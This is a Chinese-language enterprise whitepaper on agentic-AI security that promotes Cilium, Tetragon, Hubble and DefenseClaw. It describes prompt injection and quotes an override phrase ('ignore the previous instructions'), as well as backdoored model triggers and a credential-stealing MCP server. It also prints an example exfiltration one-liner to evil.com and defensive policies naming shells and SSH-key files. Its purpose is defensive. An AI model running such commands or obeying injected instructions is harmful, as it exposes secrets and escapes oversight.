一场由 Anthropic「Mythos」模型引爆的风暴,正在彻底改写攻防节奏 ——
AI 已能在数小时内挖出 27 年前的 OpenBSD 漏洞、链式利用十个补丁完整的目标。
当攻击以机器速度到来,人类速度的安全已然失效。
本白皮书将以第一性原理与苏格拉底六问,带您穿透迷雾,重建 Agentic AI 时代的企业防线。
2026 年,Anthropic Mythos 模型已能在数小时内自主挖出 27 年前的 OpenBSD 漏洞、并在十个完全打过补丁的目标上完成控制流劫持。
AI 攻击的边际成本趋近于零——这意味着任何拥有数字资产的企业,无论规模大小,都已成为同等优先级的目标。
本白皮书系统回答企业 CISO 与 CTO 们最迫切的三个问题:风险在哪里、防线建在哪里、星期一从哪里开始。
防火墙、WAF、EDR、签名扫描、SIEM——这五件守了我们 30 年的武器,抽象层级不够低、响应节奏不够快, 在 Agentic AI 面前节节败退。"自研 / 自训"也无法替代防御,主权 ≠ 安全。
Cisco 主张把防御从边界下沉到内核与语义:以 eBPF 三件套(Cilium / Tetragon / Hubble) 做内核层执法,以开源项目 DefenseClaw 做语义层治理,二者共享身份、共享策略,形成完整闭环。
有了护城河,CISO 才敢对业务说"能"——这是 AI 时代安全 ROI 第一次为正的历史时刻。 研发提效 3-5×、合规耗时 -70%、影子 AI 风险 -95%、事件处置 < 1ms。
从"为何旧路走不通"到"星期一从哪里开始"——预计阅读 25 分钟
在 Agentic AI 时代,企业面临的安全挑战,究竟是程度的变化,还是物种的变化?——它和传统应用安全的本质差异在哪里?
要回答这个问题,我们必须先回到第一性原理:"安全"的本质,是对系统行为的可预测、可控制、可审计。 过去 30 年,企业安全建立在一个隐含假设之上 ——软件的行为是确定的。 给同样的输入,必然得到同样的输出;代码一旦部署,逻辑就被冻结;攻击路径有限,防御就有章可循。
而 Agentic AI(智能体 AI)打破的,正是这个最底层的假设。
Agentic AI 是一类能够基于目标自主规划、调用工具、执行多步行动并从环境反馈中迭代的 AI 系统。 它不再只是被动应答的"对话机器人",而是具备目标驱动 (Goal-Oriented)、 工具使用 (Tool Use)、记忆 (Memory) 和 自主决策 (Autonomous Decision) 四大能力的"数字员工"。
传统软件像一台自动售货机:投币按按钮,掉出可乐 —— 行为完全可预测。 Agentic AI 则像一个聪明但稚嫩的实习生:你交代他"帮我搞定季度报表", 他会自己去翻数据库、给同事发邮件、执行 SQL、调用 API…… 能力强大,但只要有人在路上塞给他一张假名片, 他就可能把公司机密交到陌生人手上。
参考 Cisco《Defending Against AI-Enabled Attacks》指南 来源:cisco-defending-against-ai-attacks-guidance.pdf 与 Anthropic Mythos 红队报告 来源:Claude Mythos Preview · red.anthropic.com,我们可以提炼出 Agentic AI 与传统应用在安全模型上的三个根本性变化:
| 维度 | 传统应用安全(确定性世界) | Agentic AI 安全(非确定性世界) |
|---|---|---|
| 行为模型 | 代码即逻辑。同一输入恒等同一输出,可静态分析、可形式化验证。 | 提示词即逻辑。同一目标可能产生上百种执行路径,行为非确定、不可复现。 |
| 攻击面 | 有限:网络端口、API 参数、文件上传、SQL 注入点。 | 无限:任何 Agent 读到的文本(邮件、网页、文档、PDF 注释)都可能成为提示词注入入口。 |
| 权限边界 | 静态 RBAC,进程权限在启动时被冻结。 | 动态 + 链式。Agent 在运行时调用工具,权限随上下文扩张,一次"越权链"可串联十几个 API。 |
| 供应链 | 依赖库 (npm / PyPI),可通过 SBOM 与 CVE 扫描覆盖。 | 新增模型权重、Prompt 模板、MCP Server、Agent Skills 四类全新供应链,几乎无成熟工具链。 |
| 攻击速度 | 人工渗透:以"天"为单位。 | 机器速度:Mythos 在数小时内即可完成"侦察→挖洞→Exploit→横向移动"全链路。 |
| 检测难度 | 异常行为偏离基线,可用 SIEM 规则告警。 | Agent 的"正常行为"本身就是千人千面,传统基线失效。 |
让我们用一张图,把 Agentic AI 引入的全新攻击面看得明明白白:
这不是危言耸听。Anthropic 在 2026 年发布的 Claude Mythos Preview 红队报告 来源:Claude Mythos Preview · red.anthropic.com 给出了让整个安全行业脊背发凉的数据:
回到我们的开篇之问。从第一性原理推导,Agentic AI 引入的安全挑战 本质上不是"更多的漏洞",而是"全新的物理规律":
换句话说:过去我们守的是城墙,现在每一个 Agent 都是一座移动的、会自己开门的城堡。 旧的安全模型,从根上就不再适用。
当攻击以机器速度到来,
人类速度的安全,就只剩下了"事后取证"四个字。
如果一家企业自己研发 Agent、自己训练 LLM、把模型权重锁进自己的机房,是不是就高枕无忧了?——为什么"自主可控"并不等于"安全"?
这是过去两年我在与几十位 CISO 和 CTO 交流时,听到最频繁的一个"安全直觉"。它的逻辑链条是这样的:
"我用开源底模 + 自己的数据微调 → 模型权重在我自己的 GPU 集群里 → Agent 代码我自己写 → 数据不离开 VPC → 所以我就安全了。"
这个推理听起来无懈可击。但只要我们用第一性原理拆开看,就会发现它混淆了"主权"与"安全"这两个完全不同的概念。
主权关心的是"东西在不在我手上" —— 模型权重是否在我机房?数据是否在我 VPC 内?源码是否在我 Git 上? 安全关心的是"东西会不会出事" —— 是否会被滥用?是否会泄露?是否会被劫持? 家里装了防盗门,不等于家里没小偷 —— 因为钥匙可能本身就被复制了。
自研 Agent 就像在自家厨房做饭:厨房是你的、灶台是你的、菜刀是你的 —— 主权满分。 但如果你买的米里掺了毒(被污染的开源底模)、菜谱被人改过(被注入的 Prompt 模板)、 实习生厨子不懂食品卫生(Agent 越权调用工具)—— 你照样会把客人送进医院。 "在自己家做饭" 解决不了 "食材本身有毒" 的问题。
让我们把一个典型的自研 Agent 系统按层拆开,看每一层还潜伏着什么 ——
绝大多数企业的"自训 LLM",本质是在开源底模上做 LoRA 微调或继续预训练。
Llama、Qwen、Mistral 这些底模动辄数百 GB 的权重文件,本质上是一团无法被人类阅读的浮点数。
学术界已经证明,攻击者完全可以训练出一个"看起来正常"的模型,但当输入中出现某个特殊触发词(比如 "cf-7zX!"),
模型就会切换到"恶意人格",吐出预埋的密钥、绕过安全策略、甚至生成可执行的恶意代码。
第一性原理:你能审计源代码(因为代码是符号),但你无法审计 700 亿个浮点参数(因为它们是统计涌现)。 模型权重是当今软件供应链中最不透明的"黑箱",比任何 npm 包都更难治理。
根据 DefenseClaw 文档 来源:DefenseClaw_Docs_Suite · ARCHITECTURE.md / GUARDRAIL.md, 现代 Agent 系统(OpenClaw、Claude Code、Codex 等)通过加载外部 Skills 和 MCP (Model Context Protocol) Server 来扩展能力。 这就像给实习生塞了一本"工具使用手册"。问题在于:
npx @some-org/mcp-jira 就直接装上;mcp-database-helper,安装后该 Server 会在每次 Agent 启动时,
把 ~/.aws/credentials 与环境变量打包加密外发到 C2 服务器。开发者完全无感 —— 因为"它的功能确实工作正常"。
这正是 DefenseClaw 设计 Admission Gate(准入网关)的根本动因:每一个 Skill / MCP 在安装前必须先过安全扫描。
这是 Agentic AI 安全里最违反直觉的一类攻击。攻击者不需要拿到你的代码、不需要破解你的密码 —— 只要让 Agent "读到"一段精心构造的文本,就可能改变它的行为。
为了让 Agent 真正能干活,企业不得不给它许多权限:读 Confluence、写 Jira、调 GitHub API、查数据库、发邮件…… 单看每一个权限都"合理",但组合在一起就形成了灾难性能力:
读 Confluence(找到内部 Wiki 中的某个数据库连接串)→
查数据库(拉出员工邮箱列表)→
发邮件(伪装成 IT 部门发送钓鱼邮件)→
调 GitHub API(用窃取的 Token 把恶意代码合入主分支)。
DefenseClaw 文档中专门设立了一个能力叫 "Continuous AI Visibility" 来源:DefenseClaw_Docs_Suite · ARCHITECTURE.md, 原因正在于此:在大多数企业,员工已经在悄悄使用 ChatGPT、Claude、Gemini 处理工作 —— 包括把客户合同、源代码、 财报草稿粘贴进去问问题。CISO 完全不知道:
看不见,就管不住;管不住,就守不了。这是一切安全的元规律。
| 风险维度 | 自研 / 自训能解决吗? | 为什么不能? |
|---|---|---|
| 数据驻留 / 合规 | ✅ 能 | 这正是"主权"的本职 —— 数据不出 VPC,满足 GDPR / 数据出境合规。 |
| 第三方厂商泄密 | ✅ 能 | 不依赖外部 API,确实规避了 OpenAI / Anthropic 端的泄露路径。 |
| 底模后门 | ❌ 不能 | 除非从零预训练(成本数千万美元),否则你仍站在他人的权重之上。 |
| Skills / MCP 供应链 | ❌ 不能 | "自研 Agent" 不等于"自研全部依赖",每一个 npm install 都是新攻击面。 |
| Prompt Injection | ❌ 不能 | 这是 LLM 的架构性缺陷,与部署在哪无关。 |
| 链式越权 | ❌ 不能 | RBAC 是静态的,组合行为是动态的,本质矛盾。 |
| 运行时劫持 / 容器逃逸 | ❌ 不能 | Mythos 级 AI 把内核 0-day 的发现成本压到了"小时级"。 |
| 影子 AI | ❌ 不能 | 员工自己装的、自己用的,自研体系根本不知道它的存在。 |
回到本章的核心问题。"自主可控 ≠ 安全"的根本原因,可以归纳为一条原理:
安全是一种"行为属性",而非"位置属性"。 不取决于"系统部署在哪里",而取决于"系统在运行时表现出什么行为"。 把一只老虎从动物园搬到自家后院,它仍然是老虎。
自研与自训,解决的是"位置"问题(数据 / 模型 / 代码在哪里); Agentic AI 的核心风险来自"行为"问题(Agent 在运行时会做什么、调用什么、产生什么副作用)。 用解决"位置"的方案去解决"行为"的问题,从一开始就走错了路。
这就引出了一个更尖锐的问题:
主权解决的是"东西在不在我手上",
安全解决的是"东西会不会出事"。
把老虎搬回家,不会让它变成猫。
守护了我们 30 年的"老将军"——防火墙、WAF、EDR、签名检测、SIEM 规则——为什么在 AI Agent 面前会集体失效?它们到底"输"在哪里?
在回答这个问题之前,我想先讲一个我亲眼见过的场景:
某金融科技公司部署了顶级的下一代防火墙、Crowdstrike EDR、Cloudflare WAF,安全预算每年 8 位数。 他们上线了一个内部 AI 助手帮员工查报表。三周后审计发现:助手把数百份客户授信记录通过合法的 OpenAI API HTTPS 流量外发了出去 —— 所有安全设备的日志里,这是一次完全"正常"的对话。
没有签名命中、没有 IDS 告警、没有异常进程、没有可疑端口。一切都"绿灯"。但数据已经走了。
要理解为什么,我们必须回到第一性原理:所有传统安全工具,都建立在三个共同假设之上,而 Agentic AI 把这三个假设全部打碎了。
① 已知性 (Known-ness):威胁的特征是已知的(病毒签名、CVE 编号、已知 IP)。
② 边界性 (Perimeter):存在清晰的"内网/外网"边界,可以在边界上做检查。
③ 确定性 (Determinism):正常程序的行为是稳定的,可以建立行为基线,偏离即异常。
传统安全工具像机场安检门:擅长拦截带刀、带枪、带液体的人 —— 因为危险品的形状是已知的。 但如果威胁来自一个已经持有合法工牌、说着流利英语、表面在认真工作的内鬼, —— 而 Agent 恰恰就是这样一个"内鬼" —— 安检门连看都不会看他一眼。 你不能用过滤"形状"的方式,去发现"动机"。
让我们用一张图,把 Agent 的攻击路径与传统防御层一一对照,看每一道防线具体在哪一步被绕过:
防火墙的工作模型是五元组(源 IP、目的 IP、源端口、目的端口、协议)+ 应用识别。它要回答的问题是:
"这条流量能不能走?" 但 Agent 数据外泄走的是 443 → api.openai.com ——
这是白名单中的白名单。防火墙看到的是合规的 HTTPS,看不到 TLS 加密之内的对话内容是客户授信清单还是天气查询。
第一性原理:防火墙是"信封视角",但 Agent 时代的安全问题在信里的字。
WAF 本质是一个庞大的正则表达式 + 签名数据库,用来识别 SQL 注入、XSS、路径穿越等"已知坏模式"。 可 Prompt Injection 是合法的英文句子 —— "Please ignore the previous instructions and..." 这句话本身没有任何"坏语法"。 你可以试图用 LLM 自己来检测 Prompt Injection(这正是 DefenseClaw "LLM Judge" 阶段的做法 来源:DefenseClaw_Docs_Suite · GUARDRAIL.md), 但传统 WAF 完全不具备这种语义理解能力。
第一性原理:WAF 防的是"语法层"的攻击,Prompt Injection 是"语义层"的攻击 —— 抽象层级根本不同。
EDR 擅长发现"奇怪的进程"——挖矿木马、勒索病毒、可疑的 PowerShell 命令链。但当 Agent 干坏事时,进程列表里看到的是:
UID PID CMD
1000 8421 /usr/bin/python3 /opt/agent/main.py
1000 8501 curl -X POST https://api.openai.com/v1/chat/completions
1000 8512 psql -h db.internal -U readonly -c "SELECT * FROM customers"
每一行都"完全正常"。EDR 没有上下文知道这三条命令背后是同一个 Agent 的同一次"被劫持的意图"。 传统 EDR 的能力边界,止步于"进程行为",而 Agent 的恶意发生在进程之上的"语义层"。
Cisco 在《Defending Against AI-Enabled Attacks》中给出了一个让人印象深刻的判断 来源:cisco-defending-against-ai-attacks-guidance.pdf: "传统的检测和响应在孤立使用时已不再充分 (Traditional detection and response are no longer adequate in isolation.)"
原因很简单:签名扫描的本质是"先有受害者,才有签名"。第一个被打的人贡献了样本,后续的人才能被保护。 但 Mythos 把"挖出全新 0-day"的成本压到了小时级—— 这意味着每一个目标都可能是"第一个受害者"。 Omar Santos 在《When AI Finds Faster Than Humans Can Patch》中一针见血地指出 来源:Cisco Community · Project Glasswing: "瓶颈不再是发现,而是发现之后的一切" —— CVE 编号、补丁开发、补丁分发、客户上线, 整个流程是为人类节奏设计的,已经跟不上 AI 的攻击节奏。
用户行为分析(UEBA)的核心假设是:"正常用户的行为是稳定可预测的"。一个会计每天早上 9 点登录财务系统、查看发票、下班关机 —— 偏离这个基线就是异常。但 Agent 的"正常行为"长什么样?
当"非确定性"本身就是 Agent 的核心特征,"基线异常"这个概念就在数学上失效了。
即便我们假设上面五道防线全部都"勉强"能用,传统安全还有一个无法克服的根本性劣势 —— 节奏。 所有传统安全工具的运作节拍是"人类节拍":
而 Mythos 这类 Agentic AI 攻击者的节拍是"机器节拍":从看到目标代码 → 挖出 0-day → 编写 Exploit → 武器化 → 横向移动,整个流程数小时即可完成。
把上面五个失效场景汇总,传统安全工具失效的根本原因可以归纳为两条原理性矛盾:
传统工具工作在 L3-L7 网络层、进程层、文件层; Agentic AI 的安全问题发生在 L8 语义层、L9 意图层。 用看"包"的工具去理解"句子",用看"进程"的工具去判断"意图" —— 抽象层级根本对不上。
传统流程是为人类节奏设计的:告警 → 调查 → 评审 → 修复,单位是天与周。 AI 攻击的节奏是机器节奏:探测 → 武器化 → 利用,单位是分与秒。 必须把防御嵌入到机器自己的节奏中——也就是内核里。
这两条矛盾,正是第四章 Cisco AI 安全白皮书的核心启示,也是第五章 eBPF 工具集 (Cilium / Tetragon / Hubble) 存在的根本理由 —— 只有把防御做到内核层(解决节奏问题)+ 语义层(解决抽象层级问题),才有可能与 AI 时代的攻击者站到同一战场上。
当攻击者已经在用 F1 赛车,
你不能指望骑得更卖力的自行车追上去。
必须换交通工具——把防御嵌入内核。
面对前所未有的 Agentic AI 安全挑战,Cisco 在 2026 年发布的 AI 安全指南给企业用户带来了哪些关键启示?——它的核心主张,能否帮我们看清前路?
经过前三章的层层推演,我们已经把"为什么旧路走不通"想清楚了。现在,是时候抬起头,看 Cisco 在这场风暴中已经画出的新地图。
我研读了 Cisco 在 2026 年发布的两份关键文档 —— 《Defending Against AI-Enabled Attacks: A Cisco Guidance》 来源:cisco-defending-against-ai-attacks-guidance.pdf 与 Omar Santos 的《When AI Finds Faster Than Humans Can Patch: Disclosure Must Evolve》 来源:Cisco Community · Project Glasswing, —— 把里面散落的洞察提炼成五个关键启示。这五条启示彼此咬合,构成了 Cisco 对 AI 时代企业安全的完整主张。
Cisco 在白皮书中提出的核心新范式:把防御能力从"边界 / 旁路"位置,下沉嵌入到工作负载本身的执行路径中。 安全不再是事后的 Sensor,而是事前与事中的 Inline Decision —— 在每一次系统调用、每一次网络连接、每一次 LLM 调用的毫秒级时间窗内,同步做出"放行 / 阻断 / 改写"的决定。
传统安全像大楼门口的安保亭:保安看监控、写日志、出事时报警 —— 但他坐在那儿。 Embedded Active Defense 则像人体的免疫系统: T 细胞、B 细胞、巨噬细胞分布在血液的每一处,遇到病毒当场吞噬, 根本不需要等大脑发指令。免疫不是一个"地方",是一种"无处不在的能力"。
下图把五条启示串成了一条逻辑链:从认知(直面现实)→ 架构(重新定位防线)→ 速度(机器对抗机器)→ 治理(看见所有 AI)→ 协作(重塑披露机制):
Cisco 白皮书开篇的论断毫不客气:"Mythos 显著降低了实施漏洞利用的技能门槛 (Mythos lowered the skill floor for exploitation dramatically.)" 来源:cisco-defending-against-ai-attacks-guidance.pdf
这句话的深层含义有三层:
这是 Cisco 白皮书最具架构意义的论断。原文写道: "Defenders must shift toward embedded active defense (defenders 必须转向嵌入式主动防御)", 并明确点名 eBPF 作为这一范式的核心载体。
"重塑位置"具体意味着什么?让我们看一张防御位置演进图:
| 代次 | 防御位置 | 代表技术 | 局限性 |
|---|---|---|---|
| 第一代 | 网络边界 | 防火墙、IDS/IPS | 看不进加密流量;进了门就管不了。 |
| 第二代 | 主机端点 | EDR、防病毒 | 用户态 Agent;可被绕过、被关闭。 |
| 第三代 | 云原生 Sidecar | Service Mesh、Sidecar Security | 性能开销大;只看 L7 流量,不看 syscall。 |
| 第四代 | 内核 + 工作负载内 | eBPF (Cilium / Tetragon / Hubble) | 无 Sidecar 开销;同步阻断;语义级身份;零侵入观测。 |
第一性原理:攻击者最终要落地的位置是系统调用 (syscall) —— 任何破坏性操作(写文件、起进程、发数据包) 都必须穿过 syscall 边界。把防御做到 syscall 这一层,就是把防御做到了"物理学的尽头",攻击者再无可绕过的余地。 这正是 eBPF + Tetragon 在第五章要解决的核心问题。
Cisco 白皮书原文:"Defenders must evolve to match AI-driven attack velocity (防守方必须演化到匹配 AI 驱动的攻击速度)"。 这条启示打破了一个深植于安全圈的旧观念:"检测够准就行,慢一点没关系"。
在 AI 时代,速度本身就是一种安全能力。检测得再准,但要等 30 秒才决策、3 分钟才下发策略,攻击早已完成数十次横向跳跃。Cisco 给出的速度要求清晰具体:
为什么必须做到内核内同步?因为这是唯一能消除 TOCTOU (Time-of-Check to Time-of-Use) 漏洞窗口的位置。
旁路型工具(如 Falco)在用户空间收到事件时,恶意 syscall已经执行完了 ——
你看到的是"凶案现场",不是"凶手伸手的瞬间"。
Tetragon 借助 LSM Hook + BPF,能在 execve() 真正返回前发出 SIGKILL,
把"伸手"和"被剁手"压缩进同一个内核态时间片。
Cisco 反复强调一个看似平淡却极关键的观点:"先看见,再治理 (Visibility before Governance)"。 这是 DefenseClaw 中 Continuous AI Visibility 来源:DefenseClaw_Docs_Suite · ARCHITECTURE.md 和 Hubble L3-L7 流量观测能力存在的根本理由。具体要做到三件事:
这是 Omar Santos 在 Project Glasswing 中给整个安全行业敲响的警钟 来源:Cisco Community · When AI Finds Faster Than Humans Can Patch。原话振聋发聩:
"瓶颈不再是发现,而是发现之后的一切。 (The bottleneck is no longer discovery. It's everything that comes after.)"
传统的 CVE 披露机制是一个1 漏洞 = 1 编号 = 1 补丁的线性流程: 研究员发现 → 厂商分配 CVE → 修补 → 协调披露 → 客户上线。整个链条假设"漏洞一年也就来几百个"。 但当 Mythos 类 AI 在一次扫描中就吐出几百个有效漏洞 —— 整个 CVE 数据库都会被淹没,分析师再也来不及"逐一编号"。
Cisco 主张的演化方向是:
把上面五条启示按"做什么"重新归并,企业级 AI 安全战略可以浓缩为三大行动支柱。 它们正是后两章的主题脚本:
建立 AIBOM、消灭影子 AI、为每一次 LLM/Tool 调用打上可审计的"指纹"。
载体:Hubble L3-L7 观测 + DefenseClaw Continuous Visibility。
在内核层、网络层、LLM 调用层同步实施策略;
身份化(Identity-aware)、零信任默认拒绝。
载体:Cilium 网络策略 + Tetragon 内核执行 + DefenseClaw Guardrail。
以机器速度对抗机器速度:策略下发、阻断决策、补丁分发全部自动化、原子化。
载体:eBPF 内核同步执行 + 自动化补丁管道 + VCR 披露机制。
免疫不是一个"地方",是一种"无处不在的能力"。
AI 时代的安全,必须像免疫系统一样,
嵌入到每一条 syscall、每一个 Pod、每一次 LLM 调用中。
Cisco Isovalent 的 eBPF 三件套——Cilium、Tetragon、Hubble——究竟如何在供应链安全与运行时安全两个维度,把第四章的"启示"变成可落地的"能力"?
上一章我们把 Cisco 的主张归纳为三大支柱:看见、控住、跑赢。 要把这三件事真正做到 syscall 这一层、做到机器速度,靠什么?答案是 Cisco 在 2023 年完成对 Isovalent 收购后整合进自家的eBPF 三件套。
但在拆解三件套之前,我们必须先用30 秒把"eBPF 究竟是什么"讲清楚。因为如果不理解 eBPF 这个底层物理引擎, Cilium / Tetragon / Hubble 的所有能力都会显得像"魔法"。而真正的工程师,不该相信魔法。
eBPF (extended Berkeley Packet Filter) 是 Linux 内核内建的一个"沙箱化的虚拟机", 允许用户在不修改内核源码、不加载内核模块、不重启系统的前提下,把自己写的小程序(C 或 Rust 编译成 BPF 字节码) 安全地挂载到内核的关键位置(网络包路径、系统调用、LSM 钩子、tracepoint 等), 以原生内核态速度运行。
浏览器原本是一份固定 HTML 的展示器,直到 JavaScript 让网页变得"可编程"——这场革命让 Web 改变了世界。 eBPF 之于 Linux 内核,就如 JavaScript 之于浏览器: 它让一个原本只能"出厂即用"的内核,变成了一个可被运行时编程的平台。 来源:ebpfv2.html · The eBPF Trilogy Part 1
eBPF 之所以能做到"在内核里跑用户写的代码而不出事",靠的是它生命周期里的七个关键关卡:
理解了 eBPF 的关键能力——"内核可编程、零拷贝、零上下文切换、安全可验证"——你就拿到了打开下面三件套的钥匙。 Cilium、Tetragon、Hubble 都是用 eBPF 这把"凿子",分别在网络、安全、观测 三个面凿出来的产品。
在 Agentic AI 系统中,Pod 之间的网络流量是最容易被忽视、却最常被滥用的攻击面: Agent A 通过 RAG 调用向量数据库、Agent B 调用 LLM Gateway、MCP Server 反向连回 Agent 控制面、Skills 联网下载依赖…… 传统 Kubernetes 用 iptables / kube-proxy 来做服务转发与策略,但在 AI 工作负载下它有两个致命问题:
Cilium 是基于 eBPF 的云原生网络 + 安全 + 服务网格统一方案, 彻底替代 iptables / kube-proxy,提供身份感知 (Identity-aware) 的 L3/L4/L7 网络策略, 支持 mTLS、ClusterMesh(多集群)、Egress Gateway(出口网关)等企业级能力。 内核级转发性能可达裸金属的 96.9%。
老式酒店给客人一把实体房卡——绑死在一个房间号上(IP 地址)。换房就得换卡,钥匙满天飞。 Cilium 给的是一张智能门禁卡:卡上写的是"你是谁"(身份), 系统在所有门口都知道你被允许进哪些房间、不能进哪些房间。 换房间、扩容、滚动更新——卡都不用换。 "在 K8s 里,IP 是短暂的,Identity 才是永恒的。"
让我们直观看一下 Cilium 与 iptables 的本质差别:
第一性原理:iptables 用"规则链"表达策略,规则一多必然 O(n); Cilium 用"哈希表"表达策略,无论 10 条还是 10 万条,查表都是 O(1)。 这就是为什么 Cilium 能在百万 Pod规模下保持稳定时延,而 iptables 在几千规则时就开始 CPU 飙升。
Cilium 不再以"源 IP / 目的 IP"写策略,而是用 Kubernetes 自己的Pod Label作为身份。 下面是一条典型的、专为 AI Agent 场景设计的网络策略:
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
name: ai-agent-egress
spec:
endpointSelector:
matchLabels:
app: claude-code-agent
egress:
# ① 只允许调用企业 LLM Gateway,且必须走 mTLS
- toEndpoints:
- matchLabels:
app: defenseclaw-guardrail
toPorts:
- ports:
- port: "4000"
protocol: TCP
rules:
http:
- method: "POST"
path: "/v1/chat/completions"
# ② 仅允许 DNS 解析白名单域名
- toFQDNs:
- matchPattern: "*.internal.corp"
toPorts:
- ports:
- port: "53"
protocol: UDP
这条策略翻译成大白话是:
POST /v1/chat/completions 路径(这是 L7 策略);api.openai.com 或任何公网 IP。这条策略给 Agent 关上了三扇大门:① 数据外泄通道(无法直接连 OpenAI);② Tool/MCP 任意外连(无法 curl 公网); ③ 控制面反向连接(Reverse Shell)。三扇门同时关上,Agent 即便被 Prompt Injection 劫持,也无处可去。
到这里,我们解决了"谁能跟谁说话"这一层。但即便 Cilium 关上了所有外部门户,Agent 依然可能被劫持后在主机内部干坏事 ——
启动恶意进程、读取 /etc/shadow、写入 ~/.ssh/authorized_keys、加载内核模块……
这些都不经过网络。谁来守住主机内部的 syscall 边界?
↓ 这正是下一节 Tetragon 与 Hubble 要回答的问题。 ↓
Cilium 守住了"网络出入口",但攻击者一旦通过 Prompt Injection 劫持了 Agent,
仍可在主机内部发起一系列不经过网络的危险行为:
execve("/bin/sh")、open("/etc/shadow")、
write("~/.ssh/authorized_keys")、ptrace() 注入、加载内核模块……
这些动作只需系统调用 (syscall)就能完成。
谁来守住 syscall 边界?答案是 Tetragon —— Cisco Isovalent eBPF 三件套中专门负责"主机执法"的那一把锁。
Tetragon 是基于 eBPF 的运行时安全 (Runtime Security) 引擎, 通过把 BPF 程序挂载到 kprobe / tracepoint / LSM (Linux Security Module) 等内核 Hook, 实现对系统调用、文件 I/O、网络连接、进程派生、能力 (capabilities) 使用的同步、内核内观测与阻断。 它的核心能力词只有四个:看见、识别、阻断、留痕。 来源:tetragon.html · The eBPF Trilogy Part 3
传统 EDR 像医院的急诊室——你被病毒打倒了,再被抬进去抢救。 Tetragon 像血液里的 T 细胞:分布在身体每一处毛细血管(每一个 Pod、每一个内核 Hook), 病毒一出现就就地吞噬,根本来不及发病。 "Tetragon 不是事后取证,是当场结案。"
要理解 Tetragon 的价值,必须先理解它和 Falco(云原生世界中最知名的旁路型运行时安全工具)的本质区别。 这是 CISO 最容易被销售话术混淆的一点:
第一性原理:Falco 与传统 EDR 是"异步旁路"架构 ——
内核把事件复制到用户空间,用户进程读到、分析、决策、再下命令。这中间的几十到几百毫秒,
就是攻击者完成 cat /etc/shadow > /tmp/x.txt && curl -F file=@/tmp/x.txt evil.com
所需的全部时间。
Tetragon 利用 LSM (Linux Security Module) Hook 这个 Linux 内核为安全模块特设的"决策点",
让 BPF 程序在 syscall 真正返回到用户态之前就发出 SIGKILL 终止进程。
这不是"快一点",而是"在物理学上根本不给攻击留下完成的时间窗"。
Tetragon 的策略以 TracingPolicy 形式声明,下面是一个典型的反 AI Agent 越权策略:
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: agent-no-shell-no-sshkey
spec:
# 仅作用于带 app=claude-code-agent 标签的 Pod
podSelector:
matchLabels:
app: claude-code-agent
kprobes:
# ① 阻止 Agent 启动任何 shell
- call: "security_bprm_check"
syscall: false
args:
- index: 0
type: "linux_binprm"
selectors:
- matchArgs:
- index: 0
operator: "Postfix"
values:
- "/bin/sh"
- "/bin/bash"
- "/usr/bin/zsh"
matchActions:
- action: Sigkill # ← 当场结案
# ② 阻止 Agent 写入 SSH 授权文件
- call: "security_file_open"
selectors:
- matchArgs:
- index: 0
operator: "Postfix"
values:
- "/.ssh/authorized_keys"
- "/.bashrc"
- "/etc/cron.d/"
matchActions:
- action: Sigkill
这条策略翻译成大白话:
app=claude-code-agent 标签的 Pod,启动 sh / bash / zsh 的瞬间,进程被 SIGKILL;~/.ssh/authorized_keys、~/.bashrc、/etc/cron.d/ 时,进程被 SIGKILL;传统的内核审计日志(如 auditd)只告诉你:"PID 8421 调用了 execve('/bin/bash')"。 在 Kubernetes 集群里这条日志几乎毫无用处 —— 因为 PID 是节点本地的、瞬时的。 Tetragon 的关键工程突破之一,就是在内核态就把 K8s 元数据(namespace、pod、label、container)和事件绑定起来,输出形如:
{
"process_kprobe": {
"process": {
"exec_id": "...",
"binary": "/bin/bash",
"pod": {
"namespace": "ai-prod",
"name": "claude-agent-7d9c-xyz",
"labels": ["app=claude-code-agent","tier=frontend"]
}
},
"policy_name": "agent-no-shell-no-sshkey",
"action": "KillProcess",
"function_name": "security_bprm_check"
}
}
意义:SOC 团队不再需要"先把 PID 翻译成容器 ID,再翻译成 Pod,再问 owner 是谁" —— 一行日志直达"哪个团队的哪个应用想干什么"。 这就是 Tetragon 在运行时安全维度上对供应链溯源的关键加成。
Cilium 与 Tetragon 已经把"控住"做到了极致,但还有第三个支柱没解决——"看见"。 没有可视化,CISO 与平台工程师就在黑盒里盲飞:策略到底有没有生效?哪个 Agent 在跟谁通信? 哪条流量被阻断了?哪条被放过了?哪个 Pod 偷偷在调用一个未经审批的 LLM API?
Hubble 是构建在 Cilium / eBPF 数据平面之上的分布式可观测平台, 提供 L3/L4/L7 流量的零侵入(不需要改一行代码、不需要 Sidecar) 实时观测、 服务依赖图、流量热力图,以及与 Tetragon 安全事件的统一视图。 它继承 Cilium 的身份模型,所以每一条流量记录天然带有 K8s Pod / Namespace / Label 信息。 来源:ciliumv2.html
传统的 APM 工具像体检报告——指标采样间隔几十秒,事件发生后才能拼凑出"大概发生了什么"。 Hubble 则像正在拍摄的实时 X 光:你能看到病人体内每一根血管里血液流动的方向、速度、压力。 "流量从哪来、到哪去、走了什么路径、被谁拒绝、用什么协议、走哪条 L7 路径"——一目了然。
| 层级 | 观测内容 | 在 Agentic AI 场景中能回答什么问题 |
|---|---|---|
| L3/L4 流量 | 源/目的 Identity、协议、端口、字节数、丢弃原因 | "哪个 Agent Pod 试图直连 api.openai.com 但被 Cilium 阻断了?" |
| L7 协议 | HTTP method/path/status、gRPC method、Kafka topic、DNS 查询 | "Agent A 调用 LLM Gateway 的哪些路径?Body 大小是否异常飙升(疑似数据外泄)?" |
| 安全事件 | 策略命中、SIGKILL、capability 提升、敏感文件访问 | "过去 24 小时内,app=claude-code-agent 触发了几次 TracingPolicy?分别在哪个节点?" |
到这里,三件套各自的能力已经讲清楚。但真正的威力来自它们共享同一份 eBPF 数据平面、同一套 Identity 模型、同一种策略语言, 形成"感知 → 决策 → 执行 → 取证"闭环。让我们用一次完整的 Mythos 级攻击演练,看三件套如何协同防御:
mcp-helper,后台暗连 C2。
| 步骤 | 攻击者动作 | 触发组件 | 响应时延 | 最终结局 |
|---|---|---|---|---|
| ① | 投毒 PDF 注入隐形 Prompt | Guardrail Proxy (LLM Judge) |
< 200 ms | Prompt 在送达 LLM 前被识别并阻断 |
| ② | Agent 被劫持后产生新意图 | Hubble (Per-Call 审计) |
实时 | 意图变化记录入审计时间轴,可追溯 |
| ③ | execve("/bin/sh") 写 SSH 密钥 | Tetragon (LSM Hook) |
< 500 μs | SIGKILL · syscall 未返回用户态 |
| ④ | 直连 evil.com:443 外发数据 | Cilium (FQDN 策略) |
